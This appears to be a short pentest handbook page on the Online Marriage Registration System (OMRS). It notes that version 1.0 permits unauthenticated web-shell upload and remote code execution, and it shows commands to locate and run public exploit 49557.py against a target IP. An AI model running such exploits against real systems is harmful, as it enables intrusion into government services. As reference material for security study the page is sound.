OMRS

101

The Online Marriage Registration System (OMRS) is a web-based application designed to simplify and digitize the marriage registration process. It allows users to submit applications, upload documents, and track status online. Typically used by local government or civil service departments.

Attacks

OMRS 1.0 allows unauthenticated users to register, upload a PHP web shell, and achieve RCE: Exploit (49557.py):

# Search for a PoC
$ searchsploit OMRS
Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) | php/webapps/49557.py

# Exploit
$ python3 49557.py -u http://172.16.1.10:80/ -c 'whoami'

PreviousApplications NextOnline Discussion Forum

Last updated 10 days ago

Was this helpful?